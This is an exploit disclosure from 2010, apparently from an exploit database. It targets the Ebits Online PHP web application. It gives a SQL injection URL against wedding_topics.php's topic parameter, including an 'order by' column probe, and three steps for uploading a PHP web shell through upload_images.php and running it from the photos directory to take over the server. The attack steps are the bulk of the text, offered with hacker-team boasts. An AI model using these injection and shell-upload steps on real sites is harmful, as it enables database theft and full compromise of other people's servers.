Ebits Online suffers from remote SQL injection and shell upload vulnerabilities.
15733ec85f5c371c0990dd57085623a420249c80fc94ab3f0209a22398160e40
===================================
Ebits Online <= SQL & upload shell
===================================
###################################################
# Exploit Title:Ebits Online <= SQL & upload shell#
# Date: 23/6/2010 #
# Author: MeGo #
# Vendor: Link: http://www.ebitsonline.com #
# Version: 1 #
# Eamil: M1GO@live.com #
# Platform / Tested on: Windows xp TYPE: php #
# Category: webapps/0day #
# MY Team: Team Hacker Egypt #
******************************************************************
#################
#SQL [ Exploit ]#
#################
http://localhost/path/wedding_topics.php?topic= [ SQL ]
http://localhost/path/wedding_topics.php?topic=18+order+by+6--
******************************************************************
##########################
#Upload Shell [ Exploit ]#
##########################
Step [ 1 ]
http://localhost/path/upload_images.php
upload ur shell MeGo.php use [ Tember ]
step [ 2 ]
http://localhost/path/photos/MeGo.php
dir of ur Evil :D
step [ 3 ]
You Own3r Box =))
*******************************************************************
Greetz To : Dr.Silnt HilL , Alsaeek , and all Member of MY Team :d
SG: elga7ed , , exploit-db.com , inj3ct0r.com => only db Exploit :D
*******************************************************************
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969